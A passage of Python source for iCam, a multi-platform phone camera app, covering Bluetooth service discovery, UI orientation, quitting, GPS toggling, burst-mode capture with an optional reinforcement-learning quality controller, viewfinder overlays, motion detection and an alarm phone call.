            DebugPrint("BluetoothClientDiscoverServer(): port already found " \
                       "--> bailing out")
            return
        try:
            # NOTE(review): 'conn' is created but never used or closed here.
            # Kept in case the socket creation has a needed side effect on
            # the BT stack - confirm and remove if not.
            conn = btsocket.socket(btsocket.AF_BT, btsocket.SOCK_STREAM)
            if bluetoothServerAddress == "":
                # No known address: interactive discovery (user picks device).
                (bluetoothServerAddress, bluetoothServerServices) = \
                    btsocket.bt_obex_discover()
            else:
                """
                We need to discover the services on our known target phone -
                they can vary from instance to instance (i.e., service
                "btchat" can be assigned to different ports in different
                runs).
                """
                (bluetoothServerAddress, bluetoothServerServices) = \
                    btsocket.bt_obex_discover(bluetoothServerAddress)
            DebugPrint("BluetoothClientDiscoverServer(): " \
                "bluetoothServerAddress = %s, " \
                "bluetoothServerServices = %s." % \
                (bluetoothServerAddress, bluetoothServerServices))
            for serviceName in bluetoothServerServices:
                if OPP_SERVICE_NAME_TO_SEARCH_FOR in serviceName:
                    """
                    The port number is usually 9 on Nokia Symbian phones.
                    But we cannot take this for granted.
                    """
                    bluetoothServerOPPServicePort[bluetoothServerAddress] = \
                        bluetoothServerServices[serviceName]
        except:
            DebugPrintErrorTrace()
    DebugPrint("BluetoothClientDiscoverServer(): " \
        "bluetoothServerOPPServicePort = %s" % bluetoothServerOPPServicePort)
    DebugPrint("Exiting BluetoothClientDiscoverServer().")
def BluetoothClientInitializeInbox():
    """On Symbian, open the BT-only inbox and register the message callback."""
    global bluetoothInbox
    if not SYMBIAN_OS:
        return
    try:
        # 0x10009ED5 restricts the Inbox adapter to Bluetooth messages only.
        bluetoothInbox = pyinbox.Inbox(0x10009ED5)
        bluetoothInbox.bind(BluetoothMessageCallback)
    except:
        DebugPrintErrorTrace()
###############################################################################
###############################################################################
###############################################################################
###############################################################################
##########################End Bluetooth########################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
def SetUIOrientation(cameraId, isAfterImportCamera=True):
    """Set the Symbian UI orientation suited to the selected camera.

    cameraId 0 (main camera) uses this phone model's preferred orientation.
    cameraId 1 (secondary/VGA camera) also uses it on Symbian^3, but needs
    "portrait" on older S60 editions - otherwise the viewfinder image
    appears rotated (original note).
    isAfterImportCamera is currently unused; kept for caller compatibility.
    No-op on non-Symbian platforms.
    """
    if not SYMBIAN_OS:
        return
    global phoneModel
    global orientationForThisPhoneModel
    DebugPrint("Entered SetUIOrientation(cameraId = %d): " \
        "orientationForThisPhoneModel = %s." % \
        (cameraId, orientationForThisPhoneModel))
    try:
        if cameraId == 0:
            appuifw.app.orientation = orientationForThisPhoneModel
        elif cameraId == 1:
            if SYMBIAN_3:
                appuifw.app.orientation = orientationForThisPhoneModel
            else:
                # Pre-Symbian^3: the VGA camera viewfinder renders rotated
                # unless the UI is in "portrait" mode.
                appuifw.app.orientation = "portrait"
        # Flush pending UI events so the orientation change takes effect
        # (UI callbacks may run in this thread's context during ao_yield).
        e32.ao_yield()
    except:
        DebugPrintErrorTrace()
def SetLocalPhotoResolution():
    """Choose the local photo-capture resolutions per platform and model.

    Sets the global localPhotoResolution to a two-element list:
    [main-camera size, secondary-camera size]. (0, 0) marks "not decided
    here" - those platforms select the resolution through their own camera
    APIs.
    """
    global localPhotoResolution
    global localPhotoResolutionIndex, phoneModel, \
        cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
    global numCamerasSupported
    if ANDROID_OS:
        localPhotoResolution = [(0, 0), (0, 0)]
    elif SYMBIAN_OS:
        try:
            if numCamerasSupported == 1:
                if phoneModel == "SamsungSGH-G810":
                    # Special case kept from the original: this model takes
                    # its single-camera size from the RGB24 table.
                    localPhotoResolution = \
                        [cameraPhotoSizes_RGB24[0][localPhotoResolutionIndex[0]],
                         (0, 0)]
                else:
                    localPhotoResolution = \
                        [cameraPhotoSizes_JPEG_Exif[0][ \
                            localPhotoResolutionIndex[0]],
                         (0, 0)]
            elif numCamerasSupported == 2:
                localPhotoResolution = \
                    [cameraPhotoSizes_JPEG_Exif[0][ \
                        localPhotoResolutionIndex[0]],
                     cameraPhotoSizes_RGB24[1][localPhotoResolutionIndex[1]]]
                if MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD:
                    # Fragile phones: force the smallest JPEG size for the
                    # main camera.
                    localPhotoResolution[0] = \
                        cameraPhotoSizes_JPEG_Exif[0][0]
            DebugPrint("SetLocalPhotoResolution(): " \
                "localPhotoResolution = %s" % str(localPhotoResolution))
        except:
            DebugPrintErrorTrace()
    elif SYMBIAN_UIQ_OS:
        localPhotoResolution = [(0, 0), (0, 0)]
    elif iOS_PYOBJC:
        localPhotoResolution = [(0, 0), (0, 0)]
    elif WINDOWS_OS:
        localPhotoResolution = [(0, 0), (0, 0)]
    elif WINDOWS_CE_OS_PYTHONCE:
        localPhotoResolution = [(0, 0), (0, 0)]
def Help():
    """Show a brief help/about text in the Symbian UI body for ~5 seconds."""
    if not SYMBIAN_OS:
        return
    previousBody = appuifw.app.body
    try:
        textView = appuifw.Text()
        appuifw.app.body = textView
        # Only logical font names render letters correctly here; custom font
        # names showed only digits (original observation).
        textView.font = "normal"
        textView.add(u"Please visit http://go.to/slog/ to find out " \
                     "all info on how to use iCam.")
        textView.add(u"Copyright Alex Susu.")
        textView.add(u"\n")
        e32.ao_sleep(5.0)
    except:
        DebugPrintErrorTrace()
    appuifw.app.body = previousBody
def ConfirmQuit():
    """Ask the user (Symbian query dialog) whether to exit; quit on Yes."""
    if not SYMBIAN_OS:
        return
    try:
        answer = appuifw.query(u"Are you sure you want to exit?",
                               "query")
        DebugPrint("ConfirmQuit(): myAnswer = %s" % str(answer))
        # Pressing Cancel yields None; only an explicit True quits.
        if answer == True:
            Quit()
    except:
        DebugPrintErrorTrace()
"""
*args is for the Android callback
See http://docs.python.org/release/2.5.2/ref/function.html :
"If the form ``*identifier'' is present, it is initialized to a tuple
receiving any excess positional parameters, defaulting to the empty
tuple. If the form ``**identifier'' is present, it is initialized to
a new dictionary receiving any excess keyword arguments, defaulting to
a new empty dictionary."
See also http://stackoverflow.com/questions/400739/what-does-mean-in-python .
"""
def Quit(*args):
    """Shut down iCam: close the log files, release the camera and the UI
    (Symbian) and stop the reactive loop or exit the process, per platform.

    *args absorbs the extra positional arguments the Android callback
    mechanism passes.
    """
    global stdoutFile, stderrFile, deviceId
    global appLock
    #figleaf.stop()
    #figleaf.write_coverage('.figleaf')
    if ANDROID_OS:
        try:
            if MY_DEBUG_STDOUT:
                stdoutFile.close()
            if MY_DEBUG_STDERR:
                stderrFile.close()
        except:
            DebugPrintErrorTrace()
        """
        From http://docs.python.org/library/exceptions.html#exceptions.SystemExit
            "This exception is raised by the sys.exit() function. When it is not
                handled, the Python interpreter exits; no stack traceback is
                printed."
            "The os._exit() function can be used if it is absolutely positively
                necessary to exit immediately (for example, in the child process
                after a call to fork())"
        """
        # This doesn't work well because I'm catching exceptions in the caller
        #   of Quit(), namely EventHandler().
        #sys.exit()
        # Android path: signal the main loop to stop instead of hard-exiting.
        global reactiveLoopIsStarted
        reactiveLoopIsStarted = False
    elif SYMBIAN_OS:
        # See http://docs.python.org/library/os.html
        # os._exit(0)
        #myText = "Exiting iCam at %s - command given from the cellphone." \
        #    % GetCurrentDateTimeStringNice()
        myText = "Exiting iCam at %s." % GetCurrentDateTimeStringNice()
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                              WEBPAGE_UL_GZIPPED_TEXT, None)
        DebugPrint(myText)
        #if MY_DEBUG_STDOUT:
        #    stderrFile.print(myText)
        #    sys.stderr.flush()
        try:
            # Close the viewfinder, if any open.
            camera.stop_finder()
            # Release the camera so that other programs can use it.
            camera.release()
        except:
            DebugPrint("Quit(): camera returned exception.")
            DebugPrintErrorTrace()
        # e32.ao_sleep(3)
        SleepAndPetWatchdog(3.0, False)
        try:
            # Stop the watchdog timer so it cannot fire after teardown.
            global sleepAndPetWatchdogTimer
            sleepAndPetWatchdogTimer.cancel()
        except:
            # pass
            DebugPrint("Quit(): sleepAndPetWatchdogTimer.cancel returned " \
                "exception.")
            DebugPrintErrorTrace()
        # Release the main-thread lock so the app script can finish.
        appLock.signal()
        # Set the UI orientation.
        appuifw.app.orientation = "automatic" # "portrait"
        """
        This has the effect of flushing the eventual pending UI events.
        From [Mobile_Python_2007]: "The e32.ao_yield() at the end of the loop
            makes sure that the system leaves some time to register the
            keyboard events, as drawing in the tight loop consumes lots of CPU
            power and might make the system unresponsive."
        From PyS60 2.0 documentation: Yields to the active scheduler to have
            ready active objects with priority above normal scheduled for
            running. This has the effect of flushing the eventual pending UI
            events. Note that the UI callback code may be run in the context
            of the thread that performs an ao_yield. For information on active
            scheduler, see S60 SDK documentation [4].
        """
        e32.ao_yield()
        # Requests a graceful exit from the application as soon as the current
        #   script execution returns.
        appuifw.app.set_exit()
        """
        try:
            appuifw.app.set_exit()
        except:
            traceback.print_exc()
            sys.stdout.flush()
            sys.stderr.flush()
        """
        # sys.exit()
        try:
            if MY_DEBUG_STDOUT:
                """
                OLD: On Nokia 6680 we do not redirect the stdout to a file - it
                    would use too much space.
                if deviceId != IMEI_6680:
                    stdoutFile.close()
                """
                stdoutFile.close()
            if MY_DEBUG_STDERR:
                stderrFile.close()
        except:
            DebugPrintErrorTrace()
        #figleaf.stop()
        #figleaf.write_coverage('.figleaf')
    elif iOS_PYOBJC:
        try:
            if MY_DEBUG_STDOUT:
                stdoutFile.close()
            if MY_DEBUG_STDERR:
                stderrFile.close()
        except:
            DebugPrintErrorTrace()
        """
        From http://docs.python.org/library/exceptions.html#exceptions.SystemExit
            "This exception is raised by the sys.exit() function. When it is
                not handled, the Python interpreter exits; no stack traceback is
                printed."
            "The os._exit() function can be used if it is absolutely positively
                necessary to exit immediately (for example, in the child process
                after a call to fork())"
        # This doesn't work well because I'm catching exceptions in the caller
        #   of Quit(), namely EventHandler().
        """
        # sys.exit()
        # See http://docs.python.org/library/os.html
        os._exit(0)
    elif WINDOWS_CE_OS_PYTHONCE:
        try:
            if MY_DEBUG_STDOUT:
                stdoutFile.close()
            if MY_DEBUG_STDERR:
                stderrFile.close()
        except:
            DebugPrintErrorTrace()
        # See http://docs.python.org/library/os.html
        os._exit(0)
def PlayAudioFile(pathFileName):
    """Stub: does nothing and returns None (audio playback not wired up here)."""
    return None
def StartGPS():
    """Enable periodic GPS reading.

    On Symbian, selects the default positioning module and registers the
    mandatory service requestor first. Then (on all platforms) sets the
    readGPS flag, refreshes the menu and persists the new state.

    Fix vs. the original: the raw Python-2 "print" statement plus explicit
    stdout flush is replaced with DebugPrint, matching StopGPS() and the
    rest of the file; the message text is unchanged.
    """
    global readGPS
    if SYMBIAN_OS:
        try:
            DebugPrint("StartGPS(): The available GPS modules: %s\n" % \
                str(positioning.modules()) + \
                "StartGPS(): The default GPS module Id: %s.\n" % \
                str(positioning.default_module()) + \
                "StartGPS(): Detailed info about the default module: %s." % \
                str(positioning.module_info(positioning.default_module())))
            """
            Select a module (in practice, selecting default module has no
            relevance.).
            """
            positioning.select_module(positioning.default_module())
            """
            Set requestors: at least one requestor must be set before
            requesting the current position or last position.
            The last requestor must always be service requestor (whether or not
            there are other requestors).
            """
            positioning.set_requestors([{"type": "service",
                "format": "application", "data": "test_app"}])
        except:
            DebugPrintErrorTrace()
    try:
        readGPS = 1 # True
        DebugPrint("StartGPS(): made readGPS = %d." % readGPS)
        SetMenu()
        StoreState()
    except:
        DebugPrintErrorTrace()
def StopGPS():
    # Turn GPS reading off: clear the readGPS flag, refresh the menu and
    # persist the application state. Errors are logged and swallowed.
    global readGPS
    try:
        readGPS = 0 # False
        DebugPrint("StopGPS(): readGPS = %d." % readGPS)
        SetMenu()
        StoreState()
    except:
        DebugPrintErrorTrace()
def StartBurstMode():
    """Enter Burst (Turbo) capture mode.

    On Android this starts the SL4A camera preview; on Symbian it marks the
    burst flag and starts the viewfinder for whichever camera (main/front)
    is active per cameraMode, at full photo resolution (no resizing, since
    resizing is too slow in burst mode). Errors are logged and swallowed.
    """
    global viewFinderSize, photoResolutionStr, burstModeIsStarted, prevVFFrame
    if ANDROID_OS:
        try:
            DebugPrint("StartBurstMode(): calling cameraStartPreview()")
            """
            Note: cameraStartPreview() starts the Viewfinder - at this moment
            the UI submenu is no longer available.
            """
            #!!!!TODO: On Samsung i5500 it gave exception: "com.googlecode.android_scripting.rpc.RpcError: Unknown RPC." (see Z:\1PhD\ReVival\Logs\Samsung_i5500\2014_01_01_2\stdout_2014_01_01_21_29_00.txt )
            myDroid.cameraStartPreview(0, 80) #20)
            """
            myDroid.cameraStartPreview(0, 80, LOCAL_FOLDER_MEDIA_FILES)
            myDroid.cameraStartPreview(resolutionLevel=0,
                jpegQuality=20, filepath=LOCAL_FOLDER_MEDIA_FILES)
            """
            """
            This generates events like
            Result(id=169, result=[{u'data': {u'format': u'jpeg', u'encoding': u'file', u'height': 288, u'width': 352, u'filename': u'/mnt/sdcard/external_sd/iCam/Media/prv-1287331584.jpg', u'quality': 80}, u'name': u'preview', u'time': 1377247976378000L}], error=None)
            Here, the image binary data is not included
            From http://www.mithril.com.au/android/doc/WebCamFacade.html:
                "It will generate "preview" events as images become
                    available."
                "If no file element is provided, the event will
                    include the image data as a base64 encoded string."
                Event details
                 - The data element of the preview event will be a map,
                    with the following elements defined.
                 - format- currently always "jpeg"
                 - width- image width (in pixels)
                 - height- image height (in pixels)
                 - quality- JPEG quality. Number from 1-100
                 - filename- Name of file where image was saved.
                    Only relevant if filepath defined.
                 - error- included if there was an IOException saving
                    file, ie, disk full or path write protected.
                 - encoding- Data encoding. If filepath defined, will
                    be "file" otherwise "base64"
                 - data- Base64 encoded image data.
            """
            #!!!!TODO: since cameraStartPreview() is not blocking (I think) we should not come back again here
            #SleepAndPetWatchdog(120.0, False)
            # Dead code kept for reference: MJPEG streaming alternative that
            # neither generates events nor saves JPEG files.
            if False:
                """
                This does NOT generate events NOR saves JPEG files -
                    just streams MPEG over the very small HTTP server.
                """
                """
                webCamStart and webCamStop are used to start and stop
                    an Mpeg stream on a given port.
                    webcamAdjustQuality is used to ajust the quality of the
                    streaming video.
                webcamStart Starts an MJPEG stream and returns a Tuple
                    of address and port for the stream.
                    resolutionLevel (Integer) increasing this number
                        provides higher resolution (default=0)
                    jpegQuality (Integer) a number from 0-100 (default=20)
                    port (Integer) If port is specified, the webcam service
                        will bind to port, otherwise it will pick any
                        available port. (default=0)
                """
                #myDroid.webcamStart(resolutionLevel, jpegQuality, port)
                #myDroid.webcamStart(0, 40, 8080)
                myDroid.webcamStart(0, 60, 8080)
                #myDroid.webcamStop()
        except:
            DebugPrintErrorTrace()
    elif SYMBIAN_OS:
        try:
            DebugPrint("Entered StartBurstMode().")
            burstModeIsStarted = True
            # SetMenu()
            # StoreState()
            prevVFFrame = None
            # In Burst (Turbo) mode we don't resize, since it's too time consuming.
            viewFinderSize = photoResolutionStr[photoResolutionIndex][1]
            # cameraMode == (2, 0): main camera in burst mode.
            if (cameraMode[0] == 2) and (cameraMode[1] == 0):
                """
                It needs StartViewFinderForCamera("cameraId", isBackLightOn,
                    waitForVFFrames = False) because otherwise the VF is not
                    processing but 1-2 frames...
                """
                StartViewFinderForCamera(0, True, False)
            # cameraMode == (0, 2): front camera in burst mode.
            elif (cameraMode[0] == 0) and (cameraMode[1] == 2):
                """
                It needs StartViewFinderForCamera("cameraId", isBackLightOn,
                    waitForVFFrames = False) because otherwise the VF is not
                    processing but 1-2 frames...
                """
                StartViewFinderForCamera(1, True, False)
        except:
            DebugPrintErrorTrace()
def StopBurstMode():
    # Leave Burst (Turbo) mode: stop the viewfinder, restore the original
    # viewfinder size and clear the burst flag. Errors are logged.
    global viewFinderSize, VIEWFINDER_SIZE_ORIG, burstModeIsStarted
    DebugPrint("Entered StopBurstMode().")
    try:
        """
        camera.stop_finder()
        StopViewFinderForCameraCallable(False)
        """
        StopViewFinderForCameraCallable(True)
        viewFinderSize = VIEWFINDER_SIZE_ORIG
        burstModeIsStarted = False
    except:
        # SetMenu()
        # StoreState()
        DebugPrintErrorTrace()
if SYMBIAN_OS:
    """
    We define the Keyboard class so we can detect keypresses and react
    accordingly.
    """
    class Keyboard(object):
        # Tracks key state from raw appuifw key events so callers can poll
        # for held keys (IsDown) and consume discrete presses (Pressed).
        def __init__(self, onevent=lambda : None):
            # scancode -> 1/0 (currently held)
            self._keyboard_state = {}
            # scancode -> count of presses not yet consumed by Pressed()
            self._downs = {}
            self._onevent = onevent
        def HandleEvent(self, myEvent):
            """Update key state from an appuifw event, then notify observer."""
            eventType = myEvent["type"]
            if eventType == appuifw.EEventKeyDown:
                scancode = myEvent["scancode"]
                # Count a new press only on the initial down transition
                # (key-repeat events while held are ignored).
                if not self.IsDown(scancode):
                    self._downs[scancode] = self._downs.get(scancode, 0) + 1
                    self._keyboard_state[scancode] = 1
            elif eventType == appuifw.EEventKeyUp:
                self._keyboard_state[myEvent["scancode"]] = 0
            # SetMenu()
            # StoreState()
            self._onevent()
        def IsDown(self, scancode):
            """Return truthy while *scancode* is currently held down."""
            return self._keyboard_state.get(scancode, 0)
        def Pressed(self, scancode):
            """Consume and report one pending press of *scancode*."""
            pending = self._downs.get(scancode, 0)
            if pending:
                self._downs[scancode] = pending - 1
                return True
            return False
# Module-level viewfinder / recording state shared by the callbacks below.
# viewFinderTimer = e32.Ao_timer()
# viewFinderTimerIsOn = False
# Set True by ViewFinderCallback() when the first frame arrives; polled by
# StartViewFinderForCamera() when waitForVFFrames is requested.
startedReceivingFramesFromViewFinder = False
# Color used for the "MD" (motion detected) overlay text; decremented on
# each detection in ViewFinderCallbackS60BurstMode().
fillColorText = 0xFF0000
# Previous viewfinder frame, kept for frame-to-frame motion detection.
prevVFFrame = None
counterViewFinderCallback = 0
"""
On N82 (probably on N95 as well) if the viewfinder is started, but I give an
ao_sleep() it appears the Main camera shutter gets closed even if the
viewfinder is started.
"""
videoRecordFPS = 15
# Timestamp / frame counters used by Adapt() and the FPS overlay.
lastTimeAdapted = -1
numFramesLastTimeAdapted = 0
numFrames = 0
# -1 means "not currently video recording".
videoRecordStartTime = -1 # None
# videoRecordStartTime = GetTime()
videoRecordTime = 0
viewFinderStartTime = 0
avgFPS = 0.0
# posTimeForViewFinder should be adapted to viewFinderSize.
if SYMBIAN_OS:
    if SYMBIAN_3:
        posTimeForViewFinder = (118, 270)
    else:
        # posTimeForViewFinder = # (100, 230) #(200, 100)
        posTimeForViewFinder = (65, 190)
# Optional reinforcement-learning controller: if the RLearningController
# module is present, wire up an MDP whose actions set the upload thread
# count and JPEG quality, with instantaneous FPS as the reward.
try:
    import RLearningController
    RLearningControllerIsImported = True
    class iCamMDP(RLearningController.MDP):
        """
        def __init__(self):
            pass
        """
        # Instantaneous frames-per-second, updated by Adapt(); doubles as
        # the reward signal (see GetCurrentReward).
        instantFPS = -1
        def SystemUpdate(self, actionScalar):
            # Apply the chosen action: decode the flat action id into the
            # factored state vector and set the corresponding knobs.
            global numThreadsUpload, photoQuality
            try:
                """
                !!!!
                Basically, crtState = actionScalar because our MDP state vars
                are action vars also.
                """
                self.crtState = self.GetFactoredVectorFromFlatId(actionScalar)
                numThreadsUpload = 1 # 8
                # numThreadsUpload = self.crtState[0] + 1
                # photoQualityArray = [10, 25, 50, 75]
                photoQuality = photoQualityArray[self.crtState[1]]
                # For the moment, we have only 1 JPEG size.
                #photoSize = self.crtState[2]
                DebugPrint("SystemUpdate(actionScalar = %d): " \
                    "self.crtState = %s so have set " \
                    "numThreadsUpload = %d and photoQuality = %d." % \
                    (actionScalar, self.crtState,
                    numThreadsUpload, photoQuality))
            except:
                DebugPrintErrorTrace()
        def GetCurrentReward(self):
            # Reward is the instantaneous FPS measured by Adapt().
            return self.instantFPS
        """
        MDP state vars and actions:
            - num threads - 1..8
            - quality JPEG - 10, 25, 50, 75% #, 90%
            - size JPEG - 1 (maybe 2 or 4).
            Note: the JPEG size is more difficult to adapt - either changing the VF
                resolution or resizing the image are difficult operations.
        Rewards:
            - FPS (or FPS * quality)
        Maybe I can use also:
            - time (at least speculate periodicity in traffic load, maybe also
                harvested energy: time of day, day of week).
            - energy
            - ...
        """
    photoQualityArray = [10, 40, 70, 100]
    mdp = iCamMDP(numStateVars=3, stateVarsCardinality=[1, 4, 1],
        initState=[0, 1, 0])
    #stateVarsCardinality = [8, 4, 1] #[8, 4, 4]
    photoQuality = photoQualityArray[mdp.crtState[1]]
    rLearningCtrl = RLearningController.RLearningController(mdp)
    mdpEpoch = 0
except:
    # Import (or MDP construction) failed: run without the RL controller.
    RLearningControllerIsImported = False
    DebugPrint("Could not import RLearningController.")
    DebugPrintErrorTrace()
def Adapt(deltaTime, deltaNumFrames):
    """One RL adaptation step: compute the instantaneous FPS over the last
    window and let the controller react (possibly changing upload threads /
    JPEG quality via iCamMDP.SystemUpdate). Errors are logged and swallowed.
    """
    global mdpEpoch
    try:
        # mdp.instantFPS = -1
        # Probably not good: mdp.SystemUpdate(actionScalar = 0)
        """
        mdp.crtState[0] = numThreadsUpload
        mdp.crtState[1] = photoQuality
        # For the moment, we have only 1 JPEG size.
        mdp.crtState[2] = 0
        """
        # Instantaneous FPS over the elapsed window doubles as the reward.
        mdp.instantFPS = deltaNumFrames / deltaTime
        # Read mdp.instantFPS, numThreadsUpload, photoQuality
        mdpEpoch += 1
        DebugPrint("Adapt(deltaTime = %.2f, deltaNumFrames = %d): At " \
            "epoch %d (time %s), mdp.instantFPS = %.3f " \
            "(numFrames = %d)." % \
            (
            deltaTime, deltaNumFrames,
            mdpEpoch, GetCurrentDateTimeStringWithMilliseconds(),
            mdp.instantFPS, numFrames
            ))
        # actionChosen = rLearningCtrl.ReactToSystemUpdate()
        rLearningCtrl.ReactToSystemUpdate(mdpEpoch)
    except:
        DebugPrintErrorTrace()
def ViewFinderCallbackS60Record(crtTime):
    """While video recording on S60 3rd ed.+, overlay the elapsed recording
    time (mm:ss) on the canvas, refreshed every videoRecordFPS frames.

    The old time text is first redrawn in black (erase), then the updated
    time in red. Errors are logged and swallowed.
    """
    global videoRecordStartTime, videoRecordTime
    global numFrames, videoRecordFPS
    global posTimeForViewFinder
    try:
        # Only when recording (videoRecordStartTime != -1) and roughly once
        # per second (every videoRecordFPS frames).
        if (S60_EDITION[0] >= 3) and (videoRecordStartTime != -1) and \
            (numFrames % videoRecordFPS == 0):
            # appuifw.app.body.text((110, 270), u"%.2f" % videoRecordTime,
            #    font = "title", fill = 0)
            # Erase the previous time text by drawing it in black (fill=0).
            appuifw.app.body.text(posTimeForViewFinder, u"%02d:%02d" % \
                (int(videoRecordTime) / 60, int(videoRecordTime) % 60), \
                font="title", fill=0)
            # appuifw.app.body.text(posTimeForViewFinder, u"%02d" \
            #    % int(videoRecordTime), font = "title", fill = 0)
            """
            DebugPrint("ViewFinderCallback(): videoRecordTime = %f" % \
                videoRecordTime)
            """
            videoRecordTime = crtTime - videoRecordStartTime
            # Draw the updated elapsed time in red.
            appuifw.app.body.text(posTimeForViewFinder, u"%02d:%02d" % \
                (int(videoRecordTime) / 60, int(videoRecordTime) % 60), \
                font="title", fill=0xFF0000)
            """
            appuifw.app.body.text(posTimeForViewFinder,
                u"%d" % int(videoRecordTime),
                font = "title", fill = 0xFF0000)
            """
    except:
        DebugPrintErrorTrace()
def ViewFinderCallbackS60InfoAndLearning(crtTime):
    """Overlay the FPS statistics on the canvas and, in burst mode with the
    RL controller available, trigger an Adapt() step roughly every 3 s.

    Erase-then-redraw pattern: the old text is drawn in black, the updated
    text in red. Errors are logged and swallowed.
    """
    global numFrames
    global lastTimeAdapted, numFramesLastTimeAdapted
    global viewFinderStartTime, avgFPS
    global posTimeForViewFinder
    try:
        if lastTimeAdapted < 0:
            lastTimeAdapted = crtTime
        # and (cameraMode[0] == 2) and (numFrames > 0)
        """
        Note that S60 2nd edition has GetTime() with resolution of 1
        second (not milliseconds, as in S60 3rd ed).
        """
        if burstModeIsStarted:
            if RLearningControllerIsImported:
                # Adapt roughly every 3 seconds.
                if crtTime - lastTimeAdapted > 3.0:
                    """
                    We put this before Adapt() because Adapt() changes
                    mdp.instantFPS.
                    """
                    # Erase the old overlay (black) before Adapt() updates
                    # mdp.instantFPS.
                    appuifw.app.body.text(posTimeForViewFinder,
                        u"FPS = %.2f (%.2f,%d%%)" % \
                        (mdp.instantFPS, avgFPS, photoQuality),
                        font="title", fill=0)
                    Adapt(crtTime - lastTimeAdapted, numFrames - \
                        numFramesLastTimeAdapted)
                    numFramesLastTimeAdapted = numFrames
                    lastTimeAdapted = crtTime
                    # 0.1 to avoid Division by zero
                    avgFPS = numFrames / (GetTime() + 0.1 - viewFinderStartTime)
                    appuifw.app.body.text(posTimeForViewFinder,
                        u"FPS = %.2f (%.2f,%d)" % \
                        (mdp.instantFPS, avgFPS,
                        photoQuality), font="title",
                        fill=0xFF0000)
            else:
                # No RL controller: just keep the average FPS overlay fresh.
                appuifw.app.body.text(posTimeForViewFinder,
                    u"FPS = %.2f" % avgFPS, font="title",
                    fill=0)
                # 0.1 to avoid Division by zero
                avgFPS = numFrames / (GetTime() + 0.1 - viewFinderStartTime)
                appuifw.app.body.text(posTimeForViewFinder,
                    u"FPS = %.2f" % avgFPS, font="title",
                    fill=0xFF0000)
    except:
        DebugPrintErrorTrace()
def CallAlarmPhone():
    """Place a 10-second alarm call to ALARM_PHONE_NUMBER (motion alert).

    No-op when ALARM_PHONE_NUMBER is empty. Dials, sleeps ~10 s, hangs up.
    Errors are logged and swallowed.
    """
    try:
        if ALARM_PHONE_NUMBER != "":
            DebugPrint("Motion detected --> calling " \
                "at time %s." % time.asctime(GetCurrentDateTime()))
            telephone.dial(unicode(ALARM_PHONE_NUMBER))
            e32.ao_sleep(10)
            telephone.hang_up()
            # e32.ao_sleep(2)
            """
            !!!!After the call, the iCam Window is minimized, but the
                viewfinder is still active, even if not displayed.
                Maximize it using the appswitch module.
            # See http://discussion.forum.nokia.com/forum/showthread.php?214083-appswitch-module.
            # Basically I should do:
            import appswitch
            appswitch.switch_to_fg(u"myapp")
            print appswitch.switch_to_bg(u"Menu")
            """
    except:
        DebugPrintErrorTrace()
def ViewFinderCallbackS60BurstMode(crtTime, crtVFFrame):
    """Per-frame burst-mode handler (Symbian).

    For each viewfinder frame of the expected size: periodically poll the
    server for commands, optionally run frame-to-frame motion detection
    (drawing/erasing an "MD" overlay), then save the frame as JPEG and
    upload it (single- or multi-threaded, depending on configuration).
    Frames of any other size are skipped. Errors are logged and swallowed.
    """
    #global phoneModel
    global viewFinderSize
    global prevVFFrame
    global LOCAL_FOLDER_MEDIA_FILES, counterViewFinderCallback, \
        storeLocallyMedia
    global MULTITHREADED_PHOTO_BURST_MODE_UPLOAD
    """
    DebugPrint("ViewFinderCallbackS60BurstMode(): prevVFFrame = %s, " \
        "crtVFFrame.size = %s, viewFinderSize = %s, " \
        "motionDetectionIsOn=%d." % \
        (str(prevVFFrame), str(crtVFFrame.size), str(viewFinderSize),
        motionDetectionIsOn))
    """
    try:
        """
        ViewFinderCallbackS60BurstMode(): prevVFFrame = None,
            crtVFFrame.size = (320, 240), viewFinderSize = (320, 240),
            motionDetectionIsOn=1.
        """
        if crtVFFrame.size == viewFinderSize:
            # Map cameraMode to the active camera id (0 = main, 1 = front).
            if (cameraMode[0] == 2) and (cameraMode[1] == 0):
                cameraId = 0
            elif (cameraMode[0] == 0) and (cameraMode[1] == 2):
                cameraId = 1
            """
            if (motionDetectionIsOn == False) and \
                (counterViewFinderCallback == 0):
            """
            # Poll the server for new commands once per
            # NUM_FRAMES_TO_UPDATE_VIEWFINDER_EVERY frames, but only in the
            # slow (non-threaded) upload configurations.
            if counterViewFinderCallback == 0:
                if (HTTP_INTERNET_UPLOAD_FAST == False) and \
                    (MULTITHREADED_PHOTO_BURST_MODE_UPLOAD == False) and \
                    (MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 == False) and \
                    (MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 == False):
                    hasDownloadedNewCmd = DownloadCommands()
                """
                if SYMBIAN_3:
                    appuifw.app.body.begin_redraw()
                    appuifw.app.body.blit(crtVFFrame)
                    appuifw.app.body.end_redraw()
                else:
                    appuifw.app.body.blit(crtVFFrame)
                """
                appuifw.app.body.blit(crtVFFrame)
            """
            DebugPrint("ViewFinderCallbackS60BurstMode(): prevVFFrame = %s, " \
                "motionDetectionIsOn = %s" % \
                (str(prevVFFrame), str(motionDetectionIsOn)))
            """
            # Frame-to-frame motion detection; the first frame (no previous
            # frame yet) is always considered "motion".
            motionDetected = False
            #if motionDetectionIsOn is True:
            if motionDetectionIsOn:
                if prevVFFrame is not None:
                    """
                    DebugPrint("ViewFinderCallbackS60BurstMode(): again " \
                        "prevVFFrame = %s, " \
                        "motionDetectionIsOn = %s" % \
                        (str(prevVFFrame), str(motionDetectionIsOn)))
                    """
                    if DetectMotion(prevVFFrame, crtVFFrame):
                        motionDetected = True
                        prevVFFrame = crtVFFrame
                        # Draw a red rectangle.
                        #crtVFFrame.rectangle([(5, 5), (35, 35)],
                        #    0xff0000)
                        #myCanvas = appuifw.Canvas()
                        #appuifw.app.body = myCanvas
                        global fillColorText
                        """
                        if SYMBIAN_3:
                            appuifw.app.body.begin_redraw()
                            appuifw.app.body.text((100, 175), u"MD",
                                font="title", fill=fillColorText)
                            appuifw.app.body.end_redraw()
                        else:
                            appuifw.app.body.text((100, 175), u"MD",
                                font="title", fill=fillColorText)
                        """
                        appuifw.app.body.text((100, 175), u"MD", \
                            font="title", fill=fillColorText)
                        # Shift the overlay color so repeated detections are
                        # visually distinguishable.
                        fillColorText -= 0x2000
                        #myCanvas.text((10, 175),
                        #    u"A: %04d %04d %04d" % (mov["data_1"],
